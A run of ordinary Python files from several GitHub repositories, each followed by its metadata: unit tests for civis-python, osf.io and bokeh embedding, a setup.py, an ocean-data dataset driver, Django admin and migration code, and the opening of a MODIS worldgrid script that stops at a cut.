from unittest import mock
import civis
from civis.resources import API_SPEC
import pytest
@pytest.mark.parametrize('schema_tablename', [
'foo.bar', '"foo".bar', 'foo."bar"', '"foo"."bar"'
])
def test_get_table_id(schema_tablename):
"""Check that get_table_id handles quoted schema.tablename correctly."""
client = civis.APIClient(local_api_spec=API_SPEC, api_key='none')
client.get_database_id = mock.Mock(return_value=123)
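# Make the mocked tables.list() result subscriptable: index 0 returns a Mock, any other index raises KeyError.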
mock_tables = mock.MagicMock()
mock_tables.__getitem__.side_effect = {0: mock.Mock()}.__getitem__
client.tables.list = mock.Mock(return_value=mock_tables)
client.get_table_id(table=schema_tablename, database=123)
client.tables.list.assert_called_once_with(
database_id=123,
schema='foo',
name='bar'
)
def test_get_storage_host_id():
client = civis.APIClient(local_api_spec=API_SPEC, api_key='none')
class StorageHost:
def __init__(self, id, name):
self.id = id
self.name = name
def __getitem__(self, key):
return getattr(self, key)
storage_hosts = [StorageHost(1234, 'test'), StorageHost(5678, 'othertest')]
client.storage_hosts.list = mock.Mock(return_value=storage_hosts)
assert client.get_storage_host_id('test') == 1234
client.storage_hosts.list.assert_called_once_with()
assert client.get_storage_host_id(4732) == 4732
with pytest.raises(ValueError, match="Storage Host invalidname not found"):
client.get_storage_host_id('invalidname')
| {
"content_hash": "cdd2bbc45c85c12c61cd040c9ff9a3a2",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 79,
"avg_line_length": 30.15686274509804,
"alnum_prop": 0.6599479843953185,
"repo_name": "civisanalytics/civis-python",
"id": "8dd543ef1cb2fef0e6af808b7ca3a7cdb3e5cda6",
"size": "1538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "civis/tests/test_civis.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "579221"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
AuthUserFactory,
)
from osf.utils import permissions as osf_permissions
from api_tests.reviews.mixins.filter_mixins import ReviewActionFilterMixin
from api_tests.reviews.mixins.comment_settings import ReviewActionCommentSettingsMixin
@pytest.mark.enable_quickfiles_creation
class TestPreprintActionFilters(ReviewActionFilterMixin):
@pytest.fixture()
def preprint(self, all_actions):
return all_actions[0].target
@pytest.fixture(params=[True, False], ids=['moderator', 'node_admin'])
def user(self, request, preprint):
user = AuthUserFactory()
if request.param:
user.groups.add(
GroupHelper(
preprint.provider
).get_group('moderator'))
else:
preprint.node.add_contributor(
user,
permissions=[
osf_permissions.READ,
osf_permissions.WRITE,
osf_permissions.ADMIN])
return user
@pytest.fixture()
def expected_actions(self, preprint, all_actions):
return [r for r in all_actions if r.target_id == preprint.id]
@pytest.fixture()
def url(self, preprint):
return '/{}preprints/{}/review_actions/'.format(API_BASE, preprint._id)
def test_unauthorized_user(self, app, url):
res = app.get(url, expect_errors=True)
assert res.status_code == 401
user = AuthUserFactory()
res = app.get(url, auth=user.auth, expect_errors=True)
assert res.status_code == 403
@pytest.mark.enable_quickfiles_creation
class TestReviewActionSettings(ReviewActionCommentSettingsMixin):
@pytest.fixture()
def url(self, preprint):
return '/{}preprints/{}/review_actions/'.format(API_BASE, preprint._id)
| {
"content_hash": "5dc69205df985e75968e91c6da40decf",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 86,
"avg_line_length": 32.898305084745765,
"alnum_prop": 0.6548171045852653,
"repo_name": "sloria/osf.io",
"id": "d96b71a623569bb37d09c076db6e1ac4cee111d0",
"size": "1941",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "api_tests/preprints/views/test_preprint_actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109070"
},
{
"name": "Dockerfile",
"bytes": "8455"
},
{
"name": "HTML",
"bytes": "263083"
},
{
"name": "JavaScript",
"bytes": "1856674"
},
{
"name": "Mako",
"bytes": "690812"
},
{
"name": "Python",
"bytes": "8397175"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
} |
import re
import ast
from setuptools import setup, find_packages
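# Read the package version from withings_cli/cli.py without importing it: the regex locates
# the __version__ assignment and ast.literal_eval parses its literal value.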
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('withings_cli/cli.py', 'rb') as f:
__version__ = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name="withings-cli",
author="Kim Blomqvist",
author_email="[email protected]",
version=__version__,
description="A Command-line interface for Withings API",
keywords=["withings", "cli-utilities"],
license="MIT",
packages=find_packages(),
include_package_data=True,
install_requires=[
"click",
"pytoml",
"requests_oauthlib",
],
entry_points='''
[console_scripts]
withings=withings_cli.cli:cli
''',
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
],
url="https://github.com/kblomqvist/withings-cli",
download_url="https://github.com/kblomqvist/withings-cli/tarball/" + __version__,
)
| {
"content_hash": "f05daf3e1ba0d032c2b02fa57baaa5f1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 85,
"avg_line_length": 29.18918918918919,
"alnum_prop": 0.6092592592592593,
"repo_name": "kblomqvist/withings-cli",
"id": "4302555384571f2ddbe3be15a3ea8c5d6bbee461",
"size": "1080",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8245"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import mock
import unittest
import bs4
import bokeh.embed as embed
from bokeh.plotting import figure, curdoc
from bokeh.resources import CDN, JSResources, CSSResources
from bokeh.util.string import encode_utf8
from jinja2 import Template
from six import string_types
_embed_test_plot = None
def setUpModule():
global _embed_test_plot
_embed_test_plot = figure()
_embed_test_plot.circle([1, 2], [2, 3])
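# Patched in for bokeh.embed.make_id in several tests below, so generated element/doc ids are deterministic.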
def _stable_id():
return 'ID'
def test_components_return_type():
plot1 = figure()
plot2 = figure()
# This is a testing artefact; users don't have to do this in practice
curdoc().add_root(plot1)
curdoc().add_root(plot2)
r = embed.components(plot1)
assert len(r) == 2
_, divs = embed.components((plot1, plot2))
assert isinstance(divs, tuple)
_, divs = embed.components([plot1, plot2])
assert isinstance(divs, tuple)
_, divs = embed.components({"Plot 1": plot1, "Plot 2": plot2})
assert isinstance(divs, dict)
assert all(isinstance(x, string_types) for x in divs.keys())
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_plot_dict_returned_when_wrap_plot_info_is_false(mock_make_id):
plot1 = figure()
plot2 = figure()
# This is a testing artefact; users don't have to do this in practice
curdoc().add_root(plot1)
curdoc().add_root(plot2)
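# With make_id patched to _stable_id, every generated element and document id is the literal string 'ID'.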
expected_plotdict_1 = {"modelid": plot1.ref["id"], "elementid": "ID", "docid": "ID"}
expected_plotdict_2 = {"modelid": plot2.ref["id"], "elementid": "ID", "docid": "ID"}
_, plotdict = embed.components(plot1, wrap_plot_info=False)
assert plotdict == expected_plotdict_1
_, plotids = embed.components((plot1, plot2), wrap_plot_info=False)
assert plotids == (expected_plotdict_1, expected_plotdict_2)
_, plotiddict = embed.components({'p1': plot1, 'p2': plot2}, wrap_plot_info=False)
assert plotiddict == {'p1': expected_plotdict_1, 'p2': expected_plotdict_2}
class TestComponents(unittest.TestCase):
def test_result_attrs(self):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(script, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
self.assertTrue(scripts[0].attrs, {'type': 'text/javascript'})
def test_div_attrs(self):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(div, "lxml")
divs = html.findAll(name='div')
self.assertEqual(len(divs), 2)
div = divs[0]
self.assertEqual(set(div.attrs), set(['class']))
self.assertEqual(div.attrs['class'], ['bk-root'])
self.assertEqual(div.text, '\n\n')
div = divs[1]
self.assertEqual(set(div.attrs), set(['id', 'class']))
self.assertEqual(div.attrs['class'], ['bk-plotdiv'])
self.assertEqual(div.text, '')
def test_script_is_utf8_encoded(self):
script, div = embed.components(_embed_test_plot)
self.assertTrue(isinstance(script, str))
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_output_is_without_script_tag_when_wrap_script_is_false(self, mock_make_id):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(script, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
script_content = scripts[0].getText()
rawscript, div = embed.components(_embed_test_plot, wrap_script=False)
self.maxDiff = None
self.assertEqual(rawscript.strip(), script_content.strip())
class TestNotebookDiv(unittest.TestCase):
def test_return_type(self):
r = embed.notebook_div(_embed_test_plot)
self.assertTrue(isinstance(r, str))
def test_result_attrs(self):
r = embed.notebook_div(_embed_test_plot)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
self.assertTrue(scripts[0].attrs, {'type': 'text/javascript'})
def test_div_attrs(self):
r = embed.notebook_div(_embed_test_plot)
html = bs4.BeautifulSoup(r, "lxml")
divs = html.findAll(name='div')
self.assertEqual(len(divs), 2)
div = divs[0]
self.assertEqual(set(div.attrs), set(['class']))
self.assertEqual(div.attrs['class'], ['bk-root'])
self.assertEqual(div.text, '\n\n')
div = divs[1]
self.assertEqual(set(div.attrs), set(['id', 'class']))
self.assertEqual(div.attrs['class'], ['bk-plotdiv'])
self.assertEqual(div.text, '')
class TestFileHTML(unittest.TestCase):
def test_return_type(self):
class fake_template:
def __init__(self, tester, user_template_variables=None):
self.tester = tester
self.template_variables = {
"title",
"bokeh_js",
"bokeh_css",
"plot_script",
"plot_div"
}
if user_template_variables is not None:
self.template_variables.update(user_template_variables)
def render(self, template_variables):
self.tester.assertTrue(
self.template_variables.issubset(
set(template_variables.keys())
)
)
return "template result"
r = embed.file_html(_embed_test_plot, CDN, "title")
self.assertTrue(isinstance(r, str))
r = embed.file_html(_embed_test_plot, CDN, "title", fake_template(self))
self.assertTrue(isinstance(r, str))
r = embed.file_html(_embed_test_plot, CDN, "title",
fake_template(self, {"test_var"}),
{"test_var": "test"})
self.assertTrue(isinstance(r, str))
def test_file_html_handles_js_only_resources():
js_resources = JSResources(mode="relative", components=["bokeh"])
template = Template("<head>{{ bokeh_js }}</head><body></body>")
output = embed.file_html(_embed_test_plot, (js_resources, None), "title", template=template)
html = encode_utf8("<head>%s</head><body></body>" % js_resources.render_js())
assert output == html
@mock.patch('bokeh.embed.warn')
def test_file_html_provides_warning_if_no_css(mock_warn):
js_resources = JSResources()
embed.file_html(_embed_test_plot, (js_resources, None), "title")
mock_warn.assert_called_once_with(
'No Bokeh CSS Resources provided to template. If required you will need to provide them manually.'
)
def test_file_html_handles_css_only_resources():
css_resources = CSSResources(mode="relative", components=["bokeh"])
template = Template("<head>{{ bokeh_css }}</head><body></body>")
output = embed.file_html(_embed_test_plot, (None, css_resources), "title", template=template)
html = encode_utf8("<head>%s</head><body></body>" % css_resources.render_css())
assert output == html
@mock.patch('bokeh.embed.warn')
def test_file_html_provides_warning_if_no_js(mock_warn):
css_resources = CSSResources()
embed.file_html(_embed_test_plot, (None, css_resources), "title")
mock_warn.assert_called_once_with(
'No Bokeh JS Resources provided to template. If required you will need to provide them manually.'
)
def test_file_html_title_is_escaped():
r = embed.file_html(_embed_test_plot, CDN, "&<")
assert "<title>&<</title>" in r
class TestAutoloadStatic(unittest.TestCase):
def test_return_type(self):
r = embed.autoload_static(_embed_test_plot, CDN, "some/path")
self.assertEqual(len(r), 2)
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_script_attrs(self, mock_make_id):
js, tag = embed.autoload_static(_embed_test_plot, CDN, "some/path")
html = bs4.BeautifulSoup(tag, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set(['src',
'data-bokeh-model-id',
'id',
'data-bokeh-doc-id']))
self.assertEqual(attrs['data-bokeh-doc-id'], 'ID')
self.assertEqual(attrs['data-bokeh-model-id'], str(_embed_test_plot._id))
self.assertEqual(attrs['src'], 'some/path')
class TestConnectSessionOrDocument(unittest.TestCase):
def test_invalid_resources_param(self):
with self.assertRaises(ValueError):
embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources=123)
with self.assertRaises(ValueError):
embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources="whatever")
def test_resources_default_is_implicit(self):
r = embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources="default")
self.assertFalse('resources=' in r)
def test_resources_none(self):
r = embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources=None)
self.assertTrue('resources=none' in r)
class TestServerDocument(unittest.TestCase):
def test_ensure_no_session_do_model(self):
r = embed.server_document(url="http://localhost:8081/foo/bar/sliders")
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
self.assertTrue('bokeh-absolute-url=http://localhost:8081/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders&bokeh-absolute-url=%s" % \
("http://localhost:8081/foo/bar/sliders", divid, "http://localhost:8081/foo/bar/sliders")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
class TestServerSession(unittest.TestCase):
def test_model_and_session_both_required(self):
with self.assertRaises(TypeError):
embed.server_session()
with self.assertRaises(TypeError):
embed.server_session(_embed_test_plot)
with self.assertRaises(TypeError):
embed.server_session(session_id='fakesession')
def test_ensure_session_and_model(self):
r = embed.server_session(_embed_test_plot, session_id='fakesession')
self.assertTrue('bokeh-session-id=fakesession' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&bokeh-session-id=fakesession" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : str(_embed_test_plot._id),
'id' : divid,
'src' : src },
attrs)
class TestAutoloadServer(unittest.TestCase):
def test_return_type(self):
r = embed.autoload_server(_embed_test_plot, session_id='fakesession')
self.assertTrue(isinstance(r, str))
def test_script_attrs_session_id_provided(self):
r = embed.autoload_server(_embed_test_plot, session_id='fakesession')
self.assertTrue('bokeh-session-id=fakesession' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&bokeh-session-id=fakesession" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : str(_embed_test_plot._id),
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_no_session_id_provided(self):
r = embed.autoload_server(None)
self.assertFalse('bokeh-session-id' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_provided(self):
r = embed.autoload_server(url="http://localhost:8081/foo/bar/sliders", relative_urls=True)
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders" % \
("http://localhost:8081/foo/bar/sliders", divid)
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_provided_absolute_resources(self):
r = embed.autoload_server(url="http://localhost:8081/foo/bar/sliders")
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
self.assertTrue('bokeh-absolute-url=http://localhost:8081/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders&bokeh-absolute-url=%s" % \
("http://localhost:8081/foo/bar/sliders", divid, "http://localhost:8081/foo/bar/sliders")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_and_app_path_provided(self):
for path in ("/foo/bar/sliders", "/foo/bar/sliders/", "foo/bar/sliders", "foo/bar/sliders"):
r = embed.autoload_server(url="http://localhost:8081", app_path=path, relative_urls=True)
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders" % \
("http://localhost:8081/foo/bar/sliders", divid)
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_arguments_provided(self):
r = embed.server_document(arguments=dict(foo=10))
self.assertTrue('foo=10' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&foo=10" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
@mock.patch('bokeh.document.check_integrity')
def test_modelindocument_validates_document_by_default(check_integrity):
p = figure()
with embed._ModelInDocument([p]):
pass
assert check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelindocument_doesnt_validate_doc_due_to_env_var(check_integrity, monkeypatch):
monkeypatch.setenv("BOKEH_VALIDATE_DOC", "false")
p = figure()
with embed._ModelInDocument([p]):
pass
assert not check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelinemptydocument_validates_document_by_default(check_integrity):
p = figure()
with embed._ModelInEmptyDocument(p):
pass
assert check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelinemptydocument_doesnt_validate_document_due_to_env_var(check_integrity, monkeypatch):
monkeypatch.setenv("BOKEH_VALIDATE_DOC", "false")
p = figure()
with embed._ModelInEmptyDocument(p):
pass
assert not check_integrity.called
| {
"content_hash": "a370ff6e913b59647e3c6d8fc25660a1",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 114,
"avg_line_length": 39.315463917525776,
"alnum_prop": 0.580029368575624,
"repo_name": "DuCorey/bokeh",
"id": "9cec1d48344f9b8ebd76649e2b9caed0d2246dca",
"size": "19068",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bokeh/tests/test_embed.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1442"
},
{
"name": "CSS",
"bytes": "115718"
},
{
"name": "CoffeeScript",
"bytes": "1220250"
},
{
"name": "HTML",
"bytes": "48421"
},
{
"name": "JavaScript",
"bytes": "53886"
},
{
"name": "Makefile",
"bytes": "1150"
},
{
"name": "Python",
"bytes": "2216674"
},
{
"name": "Shell",
"bytes": "8660"
},
{
"name": "TypeScript",
"bytes": "209616"
}
],
"symlink_target": ""
} |
"""
@package mi.dataset.driver.adcps_jln.stc.driver
@file marine-integrations/mi/dataset/driver/adcps_jln/stc/driver.py
@author Maria Lutz
@brief Driver for the adcps_jln_stc
Release notes: Release 0.0.3. Driver modified to incorporate the
recovered data, using the ADCPS JLN parser to parse binary PD0 files;
modifications done by Jeff Roy [email protected]
Initial Release
"""
__author__ = 'Maria Lutz'
__license__ = 'Apache 2.0'
from mi.core.common import BaseEnum
from mi.core.log import get_logger
log = get_logger()
from mi.core.exceptions import ConfigurationException
from mi.dataset.dataset_driver import MultipleHarvesterDataSetDriver, DataSetDriverConfigKeys
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcParser, AdcpsJlnStcInstrumentParserDataParticle
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcMetadataParserDataParticle
from mi.dataset.harvester import SingleDirectoryHarvester
from mi.dataset.parser.adcp_pd0 import AdcpPd0Parser
from mi.dataset.parser.adcps_jln import \
AdcpsJlnParticle
class DataTypeKey(BaseEnum):
ADCPS_JLN_STC = 'adcps_jln_stc'
ADCPS_JLN = 'adcps_jln'
class AdcpsJlnStcDataSetDriver(MultipleHarvesterDataSetDriver):
def __init__(self, config, memento, data_callback, state_callback,
event_callback, exception_callback):
data_keys = DataTypeKey.list()
super(AdcpsJlnStcDataSetDriver, self).__init__(config, memento, data_callback,
state_callback, event_callback,
exception_callback, data_keys)
@classmethod
def stream_config(cls):
return [AdcpsJlnStcInstrumentParserDataParticle.type(),
AdcpsJlnStcMetadataParserDataParticle.type(),
AdcpsJlnParticle.type()]
def _build_parser(self, parser_state, file_handle, data_key=None):
# configure the parser based on the data_key
if data_key == DataTypeKey.ADCPS_JLN_STC:
config = self._parser_config.get(data_key)
config.update({
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'AdcpsJlnStcInstrumentParserDataParticle'
})
parser = AdcpsJlnStcParser(config, parser_state, file_handle,
lambda state, ingested:
self._save_parser_state(state, data_key, ingested),
self._data_callback, self._sample_exception_callback)
elif data_key == DataTypeKey.ADCPS_JLN:
config = self._parser_config.get(data_key)
config.update({
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'AdcpsJlnParticle'
})
parser = AdcpPd0Parser(config, parser_state, file_handle,
lambda state, ingested:
self._save_parser_state(state, data_key, ingested),
self._data_callback, self._sample_exception_callback)
else: # if we don't get a valid data_key raise exception
log.warn('Parser got bad configuration DataTypeKey')
raise ConfigurationException
return parser
def _build_harvester(self, driver_state):
"""
Build and return the harvester
"""
harvesters = []
instrument_harvester = self.build_single_harvester(
driver_state,
DataTypeKey.ADCPS_JLN_STC)
if instrument_harvester is not None:
harvesters.append(instrument_harvester)
recovered_harvester = self.build_single_harvester(
driver_state,
DataTypeKey.ADCPS_JLN)
if recovered_harvester is not None:
harvesters.append(recovered_harvester)
return harvesters
def build_single_harvester(self, driver_state, key):
if key in self._harvester_config:
harvester = SingleDirectoryHarvester(
self._harvester_config.get(key),
driver_state[key],
lambda filename: self._new_file_callback(filename, key),
lambda modified: self._modified_file_callback(modified, key),
self._exception_callback)
else:
harvester = None
return harvester
| {
"content_hash": "415f407096ec34c93ae26fc4a90941b6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 102,
"avg_line_length": 39.134453781512605,
"alnum_prop": 0.6175649559802447,
"repo_name": "ooici/marine-integrations",
"id": "df48423e85f05325ef99d2e50b18a84de6fbbf5d",
"size": "4657",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/adcps_jln/stc/driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "10493022"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Term, Context, Flashcard, Category, FlashcardAnswer
from proso_models.admin import pretty_date
class TermAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('identifier', 'name')
list_filter = ('lang',)
class ContextAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('name', )
list_filter = ('lang',)
class FlashcardAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'term', 'context')
search_fields = ('identifier', 'term__name', 'context__name')
list_filter = ('lang',)
class CategoryAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('name',)
list_filter = ('lang',)
class AnswerAdmin(admin.ModelAdmin):
def is_correct(self, a):
return a.item_answered == a.item_asked
is_correct.short_description = 'Correct'
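# boolean = True tells the Django admin to render this column as a true/false icon instead of text.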
is_correct.boolean = True
def asked_ago(self, a):
return pretty_date(a.time)
asked_ago.short_description = 'When Asked'
def options_count(self, a):
return a.options.count()
def context_wrapped(self, a):
return str(a.context).replace(',', ', ')
context_wrapped.short_description = 'Context'
list_display = (
'user',
'item_asked',
'item_answered',
'context_wrapped',
'is_correct',
'options_count',
'type',
'time',
'asked_ago',
)
raw_id_fields = (
'config',
'context',
'item',
'item_answered',
'item_asked',
'metainfo',
'options',
'practice_set',
'session',
'user',
)
search_fields = ('user__username',)
admin.site.register(Term, TermAdmin)
admin.site.register(Context, ContextAdmin)
admin.site.register(Flashcard, FlashcardAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(FlashcardAnswer, AnswerAdmin)
| {
"content_hash": "dfc21f3fe4cc18a141834278d83d2e1d",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 71,
"avg_line_length": 26.08974358974359,
"alnum_prop": 0.6103194103194103,
"repo_name": "adaptive-learning/proso-apps",
"id": "ebfca961a07ac8179b6780506fe39f8e7e05aa88",
"size": "2035",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proso_flashcards/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4739"
},
{
"name": "HTML",
"bytes": "35781"
},
{
"name": "JavaScript",
"bytes": "865"
},
{
"name": "Makefile",
"bytes": "4125"
},
{
"name": "Python",
"bytes": "645104"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('imager_profile', '0004_auto_20170119_1916'),
]
operations = [
migrations.AlterField(
model_name='imagerprofile',
name='address',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='imagerprofile',
name='camera_type',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='imagerprofile',
name='personal_website',
field=models.URLField(max_length=50),
),
]
| {
"content_hash": "d2eca126098835e1df0bd10a8e988414",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 27.607142857142858,
"alnum_prop": 0.5808538163001293,
"repo_name": "JSchatzman/django-imager",
"id": "7a84915d71f8d2233b196c54c36b4786e238ffd6",
"size": "846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imagersite/imager_profile/migrations/0005_auto_20170202_0024.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8947"
},
{
"name": "HTML",
"bytes": "9148"
},
{
"name": "JavaScript",
"bytes": "1325"
},
{
"name": "Python",
"bytes": "48503"
}
],
"symlink_target": ""
} |
"""
Shows how many fractions are available in the worldgrid for a given tile
Example invocation::
python rastercube/scripts/show_available_fractions.py
--tile=h10v09
--worldgrid=hdfs:///user/terrai/worldgrid/
"""
from __future__ import division
import os
import sys
import argparse
import numpy as np
import rastercube.utils as utils
import rastercube.datasources.modis as modis
import rastercube.jgrid as jgrid
import rastercube.worldgrid.grids as grids
parser = argparse.ArgumentParser(description='Show how many worldgrid fractions are available for a tile')
parser.add_argument('--tile', type=str, required=True,
help='tile name (e.g. h17v07, all)')
parser.add_argument('--worldgrid', type=str, required=True,
help='worldgrid root')
if __name__ == '__main__':
args = parser.parse_args()
arg_tilename = args.tile
modis_dir = utils.get_modis_hdf_dir()
worldgrid = args.worldgrid
ndvi_root = os.path.join(worldgrid, 'ndvi')
qa_root = os.path.join(worldgrid, 'qa')
assert jgrid.Header.exists(ndvi_root)
print 'Reading HDF headers...'
ndvi_header = jgrid.load(ndvi_root)
qa_header = jgrid.load(qa_root)
assert np.all(ndvi_header.timestamps_ms == qa_header.timestamps_ms)
if arg_tilename == 'all':
import rastercube.config as config
tiles = config.MODIS_TERRA_TILES
else:
tiles = [arg_tilename]
print 'Starting...'
for tilename in tiles:
print tilename, ':',
sys.stdout.flush()
# -- Find the HDF files available for our tile
print 'Finding files...',
sys.stdout.flush()
